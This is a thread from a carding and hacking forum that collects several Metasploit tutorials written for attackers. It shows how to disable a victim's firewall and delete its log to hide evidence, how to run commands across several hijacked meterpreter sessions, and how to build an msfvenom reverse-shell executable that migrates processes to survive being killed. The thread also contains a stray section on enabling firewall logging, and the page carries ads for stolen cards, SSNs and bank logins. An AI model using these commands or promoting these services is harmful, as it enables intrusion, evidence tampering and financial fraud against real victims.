Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis





PLACE YOUR TEXT HERE FOR ADVERTISE
PLACE YOUR TEXT HERE FOR ADVERTISE
CC+CVV Private Base Wholesale & Retail | 200+ Countries | Rare BINs
Best CC Shop Daily Updates | 200+ Countries | High Quality | 24/7 Fast Support
BlackBet.cc Banks, Shops, Real Docs, SSN+DOB, PayPal, GVoice/Gmail, Lookups




BlackHat CARDING FORUM

Not a member yet? Why not Sign up today
Login to account Create an account  




>PLACE TEXT ADVERTISING HERE< &PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE<





Announcement : Black Hat Forum is one of the Best Black Hat Carding Forum welcome you. We will share great stuff for our loved members, hope you enjoy your stay on our Black Hat Forum and you will return to us EVERYDAY. Stay Safe Enjoy Blackhat Carding Forum.

> > > >

  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


Thread tools
[Guide] How to Delete Firewall Log in Remote PC using Metasploit
Offline
Most Active Person
****
Posts: 161
Threads: 161
Joined: Apr 2020
Reputation: 0
Points: 2€


#1
04-26-2020, 10:22 AM
0
0
This article is only for tutorial purpose where we are trying to share our experience to enhance skills of IT researchers. This article will help attackers to protect themselves if they were caught by the firewall. Usually when an attacker establishes the connection with target’s system a log is generated having some details like time, ports, IP address and MAC address of the attacker. So if you are not aware of such things then you might leave evidence of your attacks in victim’s system. To prevent yourself you must go through this article where you will learn how to read the firewall logs as well as how to delete the logs from the victim’s PC.
Being an intelligent attack once you have hacked the target then after fetching important data the most essential thing is to read and delete the log files from the target system.
First, hack The Victim PC read Here
So now we are inside windows/system32 where we can perform the admin-level task. Type following command inside CMD shell to move inside the logs directory
cd Logfiles/firewall
1
cd Logfiles/firewall
Type dir to observe the present directory of the firewall.
dir
1
dir
[Image: 1.png?w=687&ssl=1]
From the screenshot you can find that there are two files and two directories, therefore being an attacker I need to check the log firewall from target PC. Now Type the following command to read firewall logs.
type pfirewall.log
1
type pfirewall.log
[Image: 2.png?w=687&ssl=1]
So the highlighted log is showing the MAC address of the attacker system. Hence to protect yourself always delete these logs.
To delete pfirewall.log we must turn off firewall, type following command to disable the firewall from victim PC.
netsh firewall set opmode mode=disable
1
netsh firewall set opmode mode=disable
[Image: 3.png?w=687&ssl=1]
Now type given below command to delete pfirewall.log
del pfirewall.log
1
del pfirewall.log
[Image: 4.png?w=687&ssl=1]
Now type given below command to verify pfirewall.log is still available or not in victim’s PC
type pfirewall.log
1
type pfirewall.log
[Image: 5.png?w=687&ssl=1]

For any network administration, it is very important that he should know how to check firewall logs in his network in order to maintain the security of the system. In this article, you will learn more about firewall utility where we have tried to describe how can any person check firewall log in his private network.
Let’s Start
Let have a look where you will learn more about firewall security. Open windows firewall then select advance setting on the left side under the control panel home.
[Image: 1.png?w=687]
Here we are at windows firewall advance setting; explore its property tab present on the right side of window’s frame.
[Image: 2.png?w=687]
Now you can see the local computer property dialog box has been opened, here select the private profile option.
[Image: 3.png?w=687]
Here another dialog box will get appear in front of you to configure a private profile for the firewall.
[Image: 4.png?w=687]
Only we need to manipulate two things in this profile without disturbing other settings. Change “NO (default)” into “YES” for log dropped packets and log successful connection as shown in the given screenshot. At last click on OK.
[Image: 5.png?w=687]
Now again we are at advance security setting of firewall here bring your cursor down toward monitoring option. From the screenshot, you can see the window frame for firewall monitoring where it contains general and logging setting. As we want to read firewall logs therefore now click on the blue link given as file name under logging setting.
[Image: 6.png?w=687]
GREAT!!! Finally, we can read the firewall log and can investigate firewall traffic in our network.
[Image: 8.png?w=687]

Again we are sharing our experience with our visitors to enhance their skills and ability. In this article, you will learn how to manage multiple sessions of different targets in a network. Once you hacked more than one system in a network and received multiple meterpreter session in your Kali Linux then how will you retrieve data simultaneously from all targets.
Let’s Proceed
First, an attacker needs to create a payload and share it in the network with his targets, then start multi handler in the Metasploit framework. Now when the available targets will open the payload in their system, the attacker will receive the series of sessions.
Here you can see from the given screenshot I have to receive two sessions from a different system.
msf exploit(handler) > sessions
1
msf exploit(handler) > sessions
[Image: 1.png?w=687&ssl=1]
In order to gather the information from both targeted system simultaneously, I had used post exploitation which let an attacker execute the same command for multiple sessions at a time.
This module executes an arbitrary command line
msf exploit(handler) > use post/multi/general/execute
msf post(execute) > set command ipconfig
msf post(execute) > set session 1
msf post(execute) >exploit
1
2
3
4
msf exploit(handler) > use post/multi/general/execute
msf post(execute) > set command ipconfig
msf post(execute) > set session 1
msf post(execute) >exploit
In the given screenshot, you can see I have executed ipconfig to know the network configuration for session 1 and here the target IP is 192.168.0.100 as result.
[Image: 2.png?w=687&ssl=1]
Then in the next step, I just need to change the session from 1 into 2 so that I can know network configuration for session 2 also and here the target IP is 192.168.0.105 as result.
msf post(execute) > set session 2
msf post(execute) >exploit
1
2
msf post(execute) > set session 2
msf post(execute) >exploit
[Image: 3.png?w=687&ssl=1]

If you are a network penetration tester then you must read this article to enhance your skill. It is the part of advanced penetration testing which might help in creating a strong payload for an attack to the targeted system. In this article you will learn more about the strength of msfvenom, here we will create such a payload which is different from my previous tutorial. The payload migrates its process if the current process gets killed hence the attacker will not lose his session if the victim kills the current process ID of the payload from its system.
Let,s Start
Open the terminal in kali Linux and type following command to generate exe payload.
msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe
1
msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe
Above command will create the raj.exe file on the Desktop now send this file to a remote system for the attack.
[Image: 1.png?w=687&ssl=1]
Load metasploit framework and type following command to start the attack.
use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
1
2
3
4
5
use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
When victim will open the raj.exe file we will get the meterpreter session.
meterpreter> sysinfo
1
meterpreter> sysinfo
[Image: 2.png?w=687&ssl=1]
Now let check the process ID of our payload.
meterpreter> ps
1
meterpreter> ps
From the highlighted text you can read the process ID shown for raj.exe i.e. 4960.
[Image: 3.png?w=687&ssl=1]
Now attacker tries himself to kill the current process state for raj.exe to verify process migration, as result process 4960 get killed.
meterpreter> kill 4960
1
meterpreter> kill 4960
But!!! Still, we have a victim’s session which means raj.exe file migrate into new process ID.
meterpreter> sysinfo
1
meterpreter> sysinfo
[Image: 4.png?w=687&ssl=1]
Find Rate
Reply







Users browsing this thread:
1 Guest(s)

 


Blackhat Carding forum


Search keywords: the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs,carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, WebMoney carding, card clone, the best hacking country, india hackers team, alboraaq , pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, x'xx passwords, WebMoney hacking, abh cc live, fresh smtp, hacking forum scam free smtp, wmz carding , spam paypal, caring, true carders, carding board, what is the best hacking forum, www.hackingforum.ru, www.carderscave.ru, www.darkgeo.com, www.darkgeo.su, www.darkgeo.ru, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer only for real hackers, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com. Carding forum, Carders Forum, Hacking Forum, Hackers Forum, Cheap WU Transfer, CCV Dumps, Legit Carders 2020, ATN Team, Altenen, Hacking Tutorials, Free Premium Porn Accounts, Carding Tools 2020, Fraud Carding, Fraudsters Marketplace, Carding Forum Scam, Inbox Spamming, Free Mailer PHP, Free VPN 2020, Best VPN 2020, AlphaBay Market, Free Fresh Mail Leads, Real Hacker Forum, Alboraaq Review, Alboraaq Hackers, Perfect Money Stealer, Darknet Forums, Darknet Hackers, Darknet Carders, Cardable Websites 2020, Buy Credit Card Dumps, Western Union Generator, Money Gram Transfers Cheap, Free CVV, Free RDP, Cheap RDP, Amazon Carding 2020, NonVBV Cardable Websites, TOR VPN 2020, Russian Carding Forum, UK Carding Forums, Bitcoin Wallet Stealer, Bitcoin Carding, Bank Stealer, Hacked Bank Logins, Bank Logins, Free Keyloggers 2020, Best Keylogger Download, Free Receipt Generator, Card Bitcoins easy, Amazon method, Best Pakistan Carders, Dumps Section, Legit Carding, Unseen, Tutamail, Deepdotweb, CC Live, Free premium logs, iPhone 6s Carded, Cheap Electronics Carding, Black Marketplace, Cheap Bank Transfers, Carding Tools, Havij Hacking, India Hackers, Cheap Apple Carding 2020, PayPal Dumps Logs, Market Hackers, Fresh email logs, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs, carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, hacking stuff, card clone, the best hacking country, india hackers team, alboraaq scamming, pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, xxx passwords, xxx username and passwords, abh cc live, fresh smtp, hacking forum scam free smtp, ams spamming, spam paypal, caring, true carders, carding board, what is the best hacking forum, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com, altenen, altenen.com, alboraaq, alboraaq.com